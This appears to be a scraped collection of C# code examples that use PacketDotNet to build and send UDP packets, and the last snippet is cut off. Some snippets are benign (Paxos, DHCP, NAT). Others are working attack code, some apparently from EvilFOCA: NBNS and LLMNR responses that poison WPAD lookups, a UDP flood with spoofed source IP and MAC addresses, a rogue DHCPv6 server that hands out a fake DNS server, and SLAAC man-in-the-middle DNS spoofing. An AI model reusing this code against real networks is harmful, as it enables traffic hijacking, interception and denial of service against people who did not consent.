示例#1
0
    private void acceptor(ref UdpPacket udp_p, ref Paxos_Packet paxos_p)
    {
        switch (paxos_p.MsgType)
        {
        case ((ushort)Phase.Paxos_1A):
            paxos_p.MsgType     = (ushort)Phase.Paxos_1B;
            paxos_p.Voted_Round = vrounds_register[paxos_p.Instance];
            paxos_p.Value       = value_register[paxos_p.Instance];
            paxos_p.Accept_ID   = datapath_id;
            rounds_register[paxos_p.Instance] = paxos_p.Voted_Round;
            udp_p.DestinationPort             = Paxos.Learner_Port;
            udp_p.UpdateUDPChecksum();
            break;

        case ((ushort)Phase.Paxos_2A):
            paxos_p.MsgType = (ushort)Phase.Paxos_2B;
            rounds_register[paxos_p.Instance]  = paxos_p.Round;
            vrounds_register[paxos_p.Instance] = paxos_p.Round;
            value_register[paxos_p.Instance]   = paxos_p.Value;
            paxos_p.Accept_ID     = datapath_id;
            udp_p.DestinationPort = Paxos.Learner_Port;
            udp_p.UpdateUDPChecksum();
            break;

        default:
            throw (new Exception("Unknown Paxos phase"));
        }
    }
示例#2
0
    override public ForwardingDecision process_packet(int in_port, ref Packet packet)
    {
        if (packet is EthernetPacket &&
            packet.Encapsulates(typeof(IPv4Packet), typeof(UdpPacket), typeof(Paxos_Packet)))
        {
            IpPacket  ip_p  = ((IpPacket)(packet.PayloadPacket));
            UdpPacket udp_p = ((UdpPacket)(ip_p.PayloadPacket));

            if (udp_p.DestinationPort == Paxos.Paxos_Coordinator_Port)
            {
                Paxos_Packet paxos_p = ((Paxos_Packet)(udp_p.PayloadPacket));

                instance_register++;
                paxos_p.Instance      = instance_register;
                udp_p.DestinationPort = Paxos.Paxos_Acceptor_Port;
                udp_p.UpdateUDPChecksum(); // NOTE we could use "udp_p.Checksum = 0" to
                                           //      follows the P4 implementation,
                                           //      avoiding the (optional) UDP checksum.
                                           //      Same applies to instances of
                                           //      checksum-setting below.
            }
        }

        // We assume that we receive from in_port and send to in_port+1.
        // NOTE that we implicitly forward all non-Paxos packets onwards,
        //      unmmodified. The downstream processor then decides how to forward
        //      them along the network.
        return(new ForwardingDecision.SinglePortForward(in_port + 1));
    }
示例#3
0
        /// <summary>
        /// Fires off on a seperate thread when a packet is available
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private void ProcessPacket(RawCapture incoming)
        {
            try
            {
                Packet         packet = Packet.ParsePacket(LinkLayers.Ethernet, incoming.Data);
                EthernetPacket ethSrc = (EthernetPacket)packet.Extract(typeof(EthernetPacket));
                IPv4Packet     ipSrc  = (IPv4Packet)packet.Extract(typeof(IPv4Packet));

                if (ipSrc.Protocol == IPProtocolType.UDP)
                {
                    UdpPacket udpSrc = (UdpPacket)packet.Extract(typeof(UdpPacket));

                    // From RFC 1002 Section 4.2.1.1
                    // Need to grab the transaction id for the reply
                    UInt16 namedTrnId = BitConverter.ToUInt16(udpSrc.PayloadData, 0);
                    // Looking for Response = query(0), OpCode = Query(0)
                    // 11000000 00000000
                    UInt16 flags = Utility.ReverseUInt16(BitConverter.ToUInt16(udpSrc.PayloadData, 2));
                    if ((flags & 0xc000) == 0)
                    {
                        // Grab the name and make sure it's WPAD
                        string name = Encoding.Default.GetString(udpSrc.PayloadData, 12, 34);
                        if (Utility.DecodeName(name) == WpadHostName)
                        {
                            Logger.AddToInfoView("Received NBNS query for {0} from {1}", WpadHostName, ethSrc.SourceHwAddress);

                            UdpPacket udpDst = new UdpPacket(NetbiosPort, NetbiosPort);
                            udpDst.PayloadData = SetupResponse(namedTrnId, GetDeviceIp(this.Device));

                            IPv4Packet ipDst = new IPv4Packet(GetDeviceIp(this.Device), ipSrc.SourceAddress);
                            ipDst.PayloadPacket = udpDst;

                            udpDst.UpdateCalculatedValues();
                            udpDst.UpdateUDPChecksum();
                            ipDst.UpdateCalculatedValues();
                            ipDst.UpdateIPChecksum();

                            EthernetPacket ethDst = new EthernetPacket(this.Device.MacAddress, ethSrc.SourceHwAddress, EthernetPacketType.IpV4);
                            ethDst.PayloadPacket = ipDst;
                            ethDst.UpdateCalculatedValues();

                            Logger.AddToInfoView("Sending poisoned response for {0}", WpadHostName);
                            this.Device.SendPacket(ethDst.Bytes);
                        }
                    }
                }
                else if (ipSrc.Protocol == IPProtocolType.TCP)
                {
                    TcpPacket tcpSrc = (TcpPacket)packet.Extract(typeof(TcpPacket));
                    if (tcpSrc.Syn)
                    {
                        Logger.AddToInfoView("SYN sent {0}:{1}", ipSrc.DestinationAddress, tcpSrc.SourcePort);
                    }
                }
            }
            catch (Exception ex)
            {
                Logger.AddToErrorView("OnPacketArrival", ex);
            }
        }
示例#4
0
        public static Packet BuildPacket(int vlanID, EthernetPacket ePacket, IPv4Packet iPacket, UdpPacket uPacket, byte[] udpData)
        {
            uPacket.PayloadData   = udpData;
            iPacket.PayloadPacket = uPacket;

            iPacket.UpdateIPChecksum();
            uPacket.UpdateUDPChecksum();

            return(BuildPacket(vlanID, ePacket, iPacket));
        }
示例#5
0
        public void GenerateLLMNRResponse(Packet packet)
        {
            try
            {
                LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
                llmnr.ParsePacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).PayloadData);
                if (llmnr.Query.Name.ToLower().Equals("wpad") && llmnr.Query.Type.Value == LLMNR.DNSType.A)
                {
                    WinPcapDevice dev      = Program.CurrentProject.data.GetDevice();
                    IPAddress     ip       = Program.CurrentProject.data.GetIPv4FromDevice(dev);
                    byte[]        ipv4Addr = ip.GetAddressBytes();

                    llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
                    {
                        Class    = evilfoca.LLMNR.DNSClass.IN,
                        Name     = llmnr.Query.Name,
                        Type     = evilfoca.LLMNR.DNSType.A,
                        RData    = ipv4Addr,
                        RDLength = (short)ipv4Addr.Length,
                        TTL      = 12
                    });
                    llmnr.IsResponse = true;


                    EthernetPacket ethDns  = new EthernetPacket(dev.MacAddress, ((EthernetPacket)packet).SourceHwAddress, EthernetPacketType.IpV4);
                    IPv4Packet     ipv4Dns = new IPv4Packet(ip, ((IPv4Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress);
                    UdpPacket      udpDns  = new UdpPacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort, ((UdpPacket)(packet.PayloadPacket.PayloadPacket)).SourcePort);

                    udpDns.PayloadData = llmnr.BuildPacket();

                    ipv4Dns.PayloadPacket = udpDns;


                    udpDns.UpdateCalculatedValues();
                    udpDns.UpdateUDPChecksum();

                    ipv4Dns.UpdateIPChecksum();
                    ipv4Dns.UpdateCalculatedValues();
                    ethDns.PayloadPacket = ipv4Dns;
                    Program.CurrentProject.data.SendPacket(ethDns);
                }
            }
            catch (Exception)
            {
            }
        }
示例#6
0
        public Packet GetSendPacket(PhysicalAddress sourceMAC, IPAddress sourceIPAddress)
        {
            // EthernetPacket ePacket = new EthernetPacket(PhysicalAddress.Parse("00-E0-4C-68-02-91"), PhysicalAddress.Parse("33-33-00-01-00-02"), EthernetPacketType.IpV6);
            // IPv6Packet ipPacket = new IPv6Packet(IPAddress.Parse("fe80::1c66:e750:c259:df88"), IPAddress.Parse("ff02::1:2"));

            EthernetPacket ePacket  = new EthernetPacket(sourceMAC, PhysicalAddress.Parse("33-33-00-01-00-02"), EthernetPacketType.IpV6);
            IPv6Packet     ipPacket = new IPv6Packet(sourceIPAddress, IPAddress.Parse("ff02::1:2"));

            ePacket.PayloadPacket = ipPacket;

            UdpPacket udpPacket = new UdpPacket(SOURCE_PORT, DEST_PORT);

            udpPacket.PayloadData = AddOtherOptions(DhcpV6MessagePacket).Encode().getAllBytes();
            udpPacket.UpdateCalculatedValues();

            ipPacket.PayloadPacket = udpPacket;
            udpPacket.UpdateUDPChecksum();
            Console.WriteLine("Send Type({0}) transactionID:{1:X} ", DhcpV6MessagePacket.GetMessageType().ToString(), DhcpV6MessagePacket.GetTransactionId());
            return(ePacket);
        }
示例#7
0
        private void processUdpFlood(Object Params)
        {
            AttackParams _params = Params as AttackParams;

            if (_params.UdpFloodEnabled)
            {
                NetworkInstruments.IpRandomizer IpSpoofer = new NetworkInstruments.IpRandomizer();
                PhysicalAddress TargetMac    = NetworkInstruments.ResolveMac(Adapter, _params.Target.Address);
                ICaptureDevice  ActiveDevice = NetworkInstruments.getActiveDevice(Adapter.GetPhysicalAddress());
                ActiveDevice.Open();
                UdpPacket  udpPacket = new UdpPacket(0, 80);
                IPv4Packet ipPacket  = new IPv4Packet(IPAddress.Any, _params.Target.Address);
                ipPacket.Protocol      = IPProtocolType.UDP;
                ipPacket.PayloadPacket = udpPacket;
                if (TargetMac == null)
                {
                    ErrorHandler(1, "Can not get MAC target address");
                    return;
                }
                ;  //unable to resolve mac
                EthernetPacket ethernetPacket = new EthernetPacket(Adapter.GetPhysicalAddress(), TargetMac, EthernetPacketType.None);
                ethernetPacket.PayloadPacket = ipPacket;
                while (Attacking)
                {
                    udpPacket.SourcePort      = (ushort)Randomizer.Next(1, 49160);
                    udpPacket.DestinationPort = (ushort)Randomizer.Next(1, 49160);
                    udpPacket.PayloadData     = new byte[Randomizer.Next(500)];
                    Randomizer.NextBytes(udpPacket.PayloadData);
                    udpPacket.UpdateCalculatedValues();
                    ipPacket.SourceAddress = IpSpoofer.GetNext(ref Randomizer, _params.RestrictedPool);
                    ipPacket.TimeToLive    = Randomizer.Next(20, 128);
                    ipPacket.UpdateCalculatedValues();
                    ipPacket.UpdateIPChecksum();
                    ethernetPacket.SourceHwAddress = NetworkInstruments.GetRandomMac(ref Randomizer);
                    ethernetPacket.UpdateCalculatedValues();
                    udpPacket.UpdateUDPChecksum();
                    ActiveDevice.SendPacket(ethernetPacket);
                    udpCounter++;
                }
            }
        }
示例#8
0
        // IPv4 + UDP数据包封装函数
        private EthernetPacket UdPonIPv4PacketMaker()
        {
            // Ether封包
            var ether = new EthernetPacket(PhysicalAddress.Parse(MakeMaCaddr(SourceMAC1.Text, SourceMAC2.Text, SourceMAC3.Text, SourceMAC4.Text, SourceMAC5.Text, SourceMAC6.Text)),
                                           PhysicalAddress.Parse(MakeMaCaddr(DestMAC1.Text, DestMAC2.Text, DestMAC3.Text, DestMAC4.Text, DestMAC5.Text, DestMAC6.Text)),
                                           EthernetPacketType.IPv4);

            // UDP封包
            var udp = new UdpPacket(Convert.ToUInt16(SourcePortTextBox.Text), Convert.ToUInt16(DestPortTextBox.Text));

            if (PayloadTextBox.Text.Length != 0)
            {
                udp.PayloadData = Encoding.ASCII.GetBytes(PayloadTextBox.Text);
            }
            udp.UpdateCalculatedValues();

            // IPv4封包
            var IPv4 = new IPv4Packet(IPAddress.Parse(MakeIPaddr(SourceIP1.Text, SourceIP2.Text, SourceIP3.Text, SourceIP4.Text)),
                                      IPAddress.Parse(MakeIPaddr(DestIP1.Text, DestIP2.Text, DestIP3.Text, DestIP4.Text)))
            {
                TimeToLive     = Convert.ToInt32(TTLTextBox.Text),
                Protocol       = IPProtocolType.UDP,
                Version        = IPVersion.IPv4,
                FragmentFlags  = Convert.ToInt16(FragmentFlagsTextBox.Text),
                FragmentOffset = Convert.ToInt32(FragmentOffsetTextBox.Text),
                TypeOfService  = Convert.ToInt32(TOSTextBox.Text),
                Id             = Convert.ToUInt16(IdentifierTextbox.Text),
                PayloadPacket  = udp
            };

            ether.PayloadPacket = IPv4;
            IPv4.ParentPacket   = ether;
            IPv4.UpdateIPChecksum();

            udp.ParentPacket = IPv4;
            udp.UpdateUDPChecksum();

            return(ether);
        }
示例#9
0
        private void SendRequest()
        {
            try
            {
                m_IStatusUpdate.UpdateStatus("Assembling DHCP Request Packet");
                DHCPRequest DhcpRequest = new DHCPRequest();
                AssembleRequest(ref DhcpRequest);

                string         destHwAddress = "FFFFFFFFFFFF";
                var            dest          = System.Net.NetworkInformation.PhysicalAddress.Parse(destHwAddress);
                EthernetPacket packet        = new EthernetPacket(m_Device.Interface.MacAddress, dest, EthernetPacketType.IpV4);
                packet.Type = EthernetPacketType.IpV4;

                var ipSourceAddress      = System.Net.IPAddress.Parse("0.0.0.0");
                var ipDestinationAddress = System.Net.IPAddress.Parse("255.255.255.255");
                var ipPacket             = new IPv4Packet(ipSourceAddress, ipDestinationAddress);

                UdpPacket udpPacket = new UdpPacket(67, 68);
                byte[]    payload   = StructureToByteArray(DhcpRequest);

                ipPacket.Version = IpVersion.IPv4;

                udpPacket.PayloadData  = payload;
                ipPacket.PayloadPacket = udpPacket;
                packet.PayloadPacket   = ipPacket;

                udpPacket.UpdateUDPChecksum();
                ipPacket.UpdateIPChecksum();

                m_IStatusUpdate.UpdateStatus("Sending DHCP Discover");
                m_Device.SendPacket(packet);
                m_IStatusUpdate.UpdateStatus("Sent DHCP Discover");
            }
            catch (Exception)
            {
                m_IStatusUpdate.UpdateStatus("Failed to send DHCP Request");
            }
        }
示例#10
0
        /*
         * public EthernetPacketType deNAT_outgoing_packet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC)
         * {
         *  EthernetPacketType ethernet_packet_type = getEthernetPacketType(ref data);
         *  if (!isIpOrArpPacket(ethernet_packet_type))
         *      return ethernet_packet_type;
         *  xbs_nat_entry nat_entry = null;
         *  lock (NAT_list)
         *  {
         *      if (NAT_list.ContainsKey(dstMAC))
         *          nat_entry = NAT_list[dstMAC];
         *  }
         *
         *  if (nat_entry != null)
         *  {
         *      replaceDestinationIpWithOriginalIP(ref data, ethernet_packet_type, ref nat_entry);
         *      updateIPChecksums(ref data);
         *  }
         *  return ethernet_packet_type;
         * }
         */
        public EthernetPacketType deNAT_outgoing_packet_PacketDotNet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC)
        {
            EthernetPacket     p = (EthernetPacket)EthernetPacket.ParsePacket(LinkLayers.Ethernet, data);
            EthernetPacketType ethernet_packet_type = getEthernetPacketType(ref data);
            IPv4Packet         p_IPV4 = null;
            ARPPacket          p_ARP  = null;
            bool packet_changed       = false;

            if (ethernet_packet_type == EthernetPacketType.IpV4)
            {
                p_IPV4 = (IPv4Packet)p.PayloadPacket;
            }
            else if (ethernet_packet_type == EthernetPacketType.Arp)
            {
                p_ARP = (ARPPacket)p.PayloadPacket;
            }
            else
            {
                return(ethernet_packet_type);
            }

            xbs_nat_entry nat_entry = null;

            lock (NAT_list)
            {
                if (dstMAC.Equals(broadcast_mac))
                {
                    if (p_ARP != null)
                    {
                        foreach (xbs_nat_entry ne in NAT_list.Values)
                        {
                            if (ne.natted_source_ip.Equals(p_ARP.TargetProtocolAddress))
                            {
                                nat_entry = ne;
                                break;
                            }
                        }
                    }
                }
                else if (NAT_list.ContainsKey(dstMAC))
                {
                    nat_entry = NAT_list[dstMAC];
                }
            }
#if DEBUG
            if (nat_entry != null)
            {
                xbs_messages.addDebugMessage("% found device in deNAT list: " + dstMAC + " " + nat_entry.natted_source_ip + "=>" + nat_entry.original_source_ip, xbs_message_sender.NAT);
            }
#endif

            if (nat_entry != null)
            {
                if (p_IPV4 != null)
                {
                    p_IPV4.DestinationAddress = nat_entry.original_source_ip;
                    p_IPV4.UpdateIPChecksum();
                    if (p_IPV4.Protocol == IPProtocolType.UDP)
                    {
                        UdpPacket p_UDP = (UdpPacket)p_IPV4.PayloadPacket;
                        if (NAT_enablePS3mode)
                        {
                            bool ret = PS3_replaceClientAnswer_hostAddr(dstMAC, ref p_UDP, nat_entry.original_source_ip, nat_entry.natted_source_ip);
                        }
                        p_UDP.UpdateUDPChecksum();
                        packet_changed = true;
                    }
                    else if (p_IPV4.Protocol == IPProtocolType.TCP)
                    {
                        ((TcpPacket)p_IPV4.PayloadPacket).UpdateTCPChecksum();
                        packet_changed = true;
                    }
                }
                else if (p_ARP != null)
                {
                    p_ARP.TargetProtocolAddress = nat_entry.original_source_ip;
                    packet_changed = true;
                }
            }
            if (packet_changed)
            {
                data = p.BytesHighPerformance.ActualBytes();
            }

            return((packet_changed) ? ethernet_packet_type : EthernetPacketType.None);
        }
示例#11
0
        /*
         * public EthernetPacketType NAT_incoming_packet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC)
         * {
         *  EthernetPacketType ethernet_packet_type = getEthernetPacketType(ref data);
         *  if (!isIpOrArpPacket(ethernet_packet_type))
         *      return ethernet_packet_type;
         *  xbs_nat_entry nat_entry;
         *  lock (NAT_list)
         *  {
         *      if (!NAT_list.TryGetValue(srcMAC, out nat_entry))
         *      {
         *          IPAddress sourceIP = getSourceIPFromRawPacketData(ref data, ethernet_packet_type);
         *          if (sourceIP.Equals(ip_zero))
         *              return ethernet_packet_type;
         *          IPAddress destinationIP = getDestinationIPFromRawPacketData(ref data, ethernet_packet_type);
         *          nat_entry = ip_pool.requestIP( sourceIP, srcMAC );
         *          if (nat_entry == null)
         *          {
         *              xbs_messages.addInfoMessage("!! % out of NAT IPs. Could not nat incoming packet");
         *              return ethernet_packet_type;
         *          }
         *          NAT_list.Add(srcMAC, nat_entry);
         #if DEBUG
         *          xbs_messages.addDebugMessage("% new device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip);
         #endif
         *      }
         *      else
         *      {
         #if DEBUG
         *          xbs_messages.addDebugMessage("% found device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip);
         #endif
         *      }
         *  }
         *  replaceSourceIpWithNATSourceIP(ref data, ethernet_packet_type, ref nat_entry);
         *  if (ethernet_packet_type == EthernetPacketType.IpV4)
         *  {
         *      if (dstMAC.Equals(broadcast_mac) && nat_entry.natted_broadcast!=null)
         *          replaceBroadcastIPAddress(ref data, ref nat_entry.natted_broadcast_bytes);
         *      updateIPChecksums(ref data);
         *  }
         *  return ethernet_packet_type;
         * }
         */
        public EthernetPacketType NAT_incoming_packet_PacketDotNet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC, ref Packet p, ref IPv4Packet p_IPV4, ref ARPPacket p_ARP)
        {
            xbs_nat_entry nat_entry;

            EthernetPacketType p_type = ((EthernetPacket)p).Type;

            if (p_type != EthernetPacketType.IpV4 && p_type != EthernetPacketType.Arp)
            {
                return(p_type);
            }

            lock (NAT_list)
            {
                if (!NAT_list.TryGetValue(srcMAC, out nat_entry))
                {
                    IPAddress sourceIP = (p_IPV4 != null) ? p_IPV4.SourceAddress : p_ARP.SenderProtocolAddress;
                    if (sourceIP.Equals(ip_zero))
                    {
                        return(p_type);
                    }
                    IPAddress destinationIP = (p_IPV4 != null) ? p_IPV4.DestinationAddress : p_ARP.TargetProtocolAddress;
                    nat_entry = ip_pool.requestIP(sourceIP, srcMAC);
                    if (nat_entry == null)
                    {
                        if (!natIPpoolOverflow_warning_shown)
                        {
                            natIPpoolOverflow_warning_shown = true;
                            xbs_messages.addInfoMessage("!! % out of NAT IPs. Could not NAT incoming packet", xbs_message_sender.NAT, xbs_message_type.WARNING);
                        }
                        return(p_type);
                    }
                    else
                    {
                        natIPpoolOverflow_warning_shown = false;
                        NAT_list.Add(srcMAC, nat_entry);
#if DEBUG
                        xbs_messages.addDebugMessage("% new device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip, xbs_message_sender.NAT);
#endif
                    }
                }
                else
                {
#if DEBUG
                    xbs_messages.addDebugMessage("% found device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip, xbs_message_sender.NAT);
#endif
                }
            }
            if (p_IPV4 != null)
            {
                p_IPV4.SourceAddress = nat_entry.natted_source_ip;
                if (dstMAC.Equals(broadcast_mac) && nat_entry.natted_broadcast != null)
                {
                    p_IPV4.DestinationAddress = nat_entry.natted_broadcast;
                }
                p_IPV4.UpdateIPChecksum();
                if (p_IPV4.Protocol == IPProtocolType.UDP)
                {
                    UdpPacket p_UDP = (UdpPacket)p_IPV4.PayloadPacket;
                    if (NAT_enablePS3mode)
                    {
                        bool ret = PS3_replaceInfoResponse_hostAddr(dstMAC, ref p_UDP, nat_entry.natted_source_ip);
                        if (!ret)
                        {
                            ret = PS3_replaceClientAnswer_hostAddr(dstMAC, ref p_UDP, nat_entry.natted_source_ip, nat_entry.original_source_ip);
                        }
                    }
                    p_UDP.UpdateUDPChecksum();
                }
                else if (p_IPV4.Protocol == IPProtocolType.TCP)
                {
                    ((TcpPacket)p_IPV4.PayloadPacket).UpdateTCPChecksum();
                }
            }
            else
            {
                p_ARP.SenderProtocolAddress = nat_entry.natted_source_ip;
            }
            data = p.BytesHighPerformance.ActualBytes();
            return(p_type);
        }
示例#12
0
        unsafe public void AnalyzePacket(WinPcapDevice device, Packet p)
        {
            if (p.PayloadPacket == null || p.PayloadPacket.PayloadPacket == null || !(p.PayloadPacket.PayloadPacket is UdpPacket))
            {
                return;
            }
            UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket;

            if (udp.ParentPacket == null)
            {
                return;
            }
            if (!(udp.ParentPacket is IPv6Packet))
            {
                return;
            }

            if (attacks.Where(A => A.attackType == AttackType.DHCPIpv6).Count() == 0)
            {
                return;
            }

            DhcpIPv6 attack = (DhcpIPv6)attacks.Where(A => A.attackType == AttackType.DHCPIpv6).First();


            IPv6Packet     packetIpLayer = (IPv6Packet)udp.ParentPacket;
            EthernetPacket ethernet      = (EthernetPacket)p;

            /*
             * Info: http://en.wikipedia.org/wiki/DHCPv6
             * Example
             * In this example, the server's link-local address is fe80::0011:22ff:fe33:5566/64 and the client's link-local address is fe80::aabb:ccff:fedd:eeff/64.
             * DHCPv6 client sends a Solicit from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547.
             * DHCPv6 server replies with an Advertise from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546.
             * DHCPv6 client replies with a Request from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547. (All client messages are sent to the multicast address, per section 13 of RFC 3315.)
             * DHCPv6 server finishes with a Reply from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546.
             */
            DHCPv6Packet pa = new DHCPv6Packet();

            pa.ParsePacket(udp.PayloadData);

            if (packetIpLayer.DestinationAddress.Equals(IPAddress.Parse("ff02::1:2")))
            {
                EthernetPacket newPEthernet = new EthernetPacket(device.Interface.MacAddress,
                                                                 ethernet.SourceHwAddress,
                                                                 EthernetPacketType.IpV6);
                UdpPacket  newUDP        = null;
                IPAddress  ipv6LocalLink = null;
                IPv6Packet newIpv6       = null;
                switch (pa.MessageType)
                {
                case DHCPv6Type.Solicit:
                    if (pa.Options.ContainsKey(DHCPv6OptionCode.ClientIdentifier) && pa.Options.ContainsKey(DHCPv6OptionCode.IANA))
                    {
                        newUDP = new UdpPacket(547, 546);
                        byte[] iaid = pa.Options[DHCPv6OptionCode.IANA].Value;
                        pa.MessageType = DHCPv6Type.Advertise;
                        pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
                        pa.Options.Remove(DHCPv6OptionCode.FQDM);
                        pa.Options.Remove(DHCPv6OptionCode.VendorClass);
                        pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
                        pa.Options.Remove(DHCPv6OptionCode.IANA);
                        pa.AddServerIdentifierOption(device.MacAddress);
                        pa.AddIANAOption(IPAddress.Parse(string.Format("{0}:{1}", attack.fakeIPRange.ToString().Substring(0, attack.fakeIPRange.ToString().LastIndexOf(':')), IpID)), iaid);
                        pa.AddDNSOption(attack.fakeDns);
                        pa.AddDomainSearchListOption(new string[] { "google.com" });
                        IpID++;
                        newUDP.PayloadData = pa.BuildPacket();

                        ipv6LocalLink              = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
                        newIpv6                    = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
                        newIpv6.HopLimit           = 1;
                        newIpv6.PayloadPacket      = newUDP;
                        newPEthernet.PayloadPacket = newIpv6;
                        newUDP.UpdateCalculatedValues();
                        newUDP.UpdateUDPChecksum();
                        Program.CurrentProject.data.SendPacket(newPEthernet);
                    }
                    break;

                case DHCPv6Type.Request:
                    newUDP         = new UdpPacket(547, 546);
                    pa.MessageType = DHCPv6Type.Reply;
                    pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
                    pa.Options.Remove(DHCPv6OptionCode.FQDM);
                    pa.Options.Remove(DHCPv6OptionCode.VendorClass);
                    pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
                    pa.Options.Remove(DHCPv6OptionCode.DNS);

                    pa.AddDNSOption(attack.fakeDns);
                    pa.AddDomainSearchListOption(new string[] { "google.com" });
                    newUDP.PayloadData = pa.BuildPacket();

                    ipv6LocalLink              = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
                    newIpv6                    = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
                    newIpv6.HopLimit           = 1;
                    newIpv6.PayloadPacket      = newUDP;
                    newPEthernet.PayloadPacket = newIpv6;
                    newUDP.UpdateCalculatedValues();
                    newUDP.UpdateUDPChecksum();
                    Program.CurrentProject.data.SendPacket(newPEthernet);
                    break;

                case DHCPv6Type.InformationRequest:
                    newUDP         = new UdpPacket(547, 546);
                    pa.MessageType = DHCPv6Type.Reply;
                    pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
                    pa.Options.Remove(DHCPv6OptionCode.FQDM);
                    pa.Options.Remove(DHCPv6OptionCode.VendorClass);
                    pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
                    pa.Options.Remove(DHCPv6OptionCode.IANA);
                    pa.AddServerIdentifierOption(device.MacAddress);
                    pa.AddDNSOption(attack.fakeDns);
                    pa.AddDomainSearchListOption(new string[] { "google.com" });
                    newUDP.PayloadData = pa.BuildPacket();

                    ipv6LocalLink              = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
                    newIpv6                    = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
                    newIpv6.HopLimit           = 1;
                    newIpv6.PayloadPacket      = newUDP;
                    newPEthernet.PayloadPacket = newIpv6;
                    newUDP.UpdateCalculatedValues();
                    newUDP.UpdateUDPChecksum();
                    Program.CurrentProject.data.SendPacket(newPEthernet);
                    break;

                default:
                    break;
                }
            }
        }
示例#13
0
文件: Router.cs 项目: ztxyzu/EvilFOCA
        private void DNSCheck(Packet p)
        {
            EthernetPacket ethernet = (EthernetPacket)p;

            if (p.PayloadPacket.PayloadPacket is UdpPacket)
            {
                UdpPacket udp = p.PayloadPacket.PayloadPacket as UdpPacket;
                attacks.Where(a => a.attackType == AttackType.SlaacMitm).ToList().ForEach(currentAttack =>
                {
                    MitmAttack mitmAttack = currentAttack as MitmAttack;

                    if (p.PayloadPacket is IPv6Packet)
                    {
                        switch (udp.DestinationPort)
                        {
                        case 53:
                            Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData);
                            var aaaaDns = (from q in response.Questions
                                           where q.QType == Heijden.DNS.QType.AAAA || q.QType == Heijden.DNS.QType.A
                                           select q).ToList();

                            //Para mostrar la pelotita de conexión a internet OK, respondemos al paquete Teredo de Microsoft en formato A.
                            var aTeredoDns = (from q in response.Questions
                                              where q.QType == Heijden.DNS.QType.A &&
                                              (q.QName.ToLower().Contains("teredo") || q.QName.ToLower().Contains("msftncsi"))
                                              select q).ToList();

                            if (aaaaDns != null && aaaaDns.Count > 0)
                            {
                                DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
                                string q            = query.name;
                                IPAddress[] ips     = Dns.GetHostAddresses(q);

                                DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv6, query.transID, query.nameDnsFormat, ips[0]);
                                byte[] respByteAr     = resp.GeneratePacket();

                                EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
                                IPv6Packet ipv6Dns    = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
                                UdpPacket udpDns      = new UdpPacket(udp.DestinationPort, udp.SourcePort);

                                udpDns.PayloadData    = respByteAr;
                                ipv6Dns.PayloadPacket = udpDns;
                                ethDns.PayloadPacket  = ipv6Dns;

                                udpDns.UpdateCalculatedValues();
                                udpDns.UpdateUDPChecksum();
                                ipv6Dns.UpdateCalculatedValues();
                                Program.CurrentProject.data.SendPacket(ethDns);
                            }
                            else if (aTeredoDns != null && aTeredoDns.Count > 0)
                            {
                                DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
                                string q            = query.name;
                                IPAddress[] ips     = Dns.GetHostAddresses(q);

                                DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv4, query.transID, query.nameDnsFormat, ips[0]);
                                byte[] respByteAr     = resp.GeneratePacket();

                                EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
                                IPv6Packet ipv6Dns    = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
                                UdpPacket udpDns      = new UdpPacket(udp.DestinationPort, udp.SourcePort);

                                udpDns.PayloadData    = respByteAr;
                                ipv6Dns.PayloadPacket = udpDns;
                                ethDns.PayloadPacket  = ipv6Dns;

                                udpDns.UpdateCalculatedValues();
                                udpDns.UpdateUDPChecksum();
                                ipv6Dns.UpdateCalculatedValues();
                                Program.CurrentProject.data.SendPacket(ethDns);
                            }
                            break;

                        case 5355:
                            LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
                            llmnr.ParsePacket(udp.PayloadData);
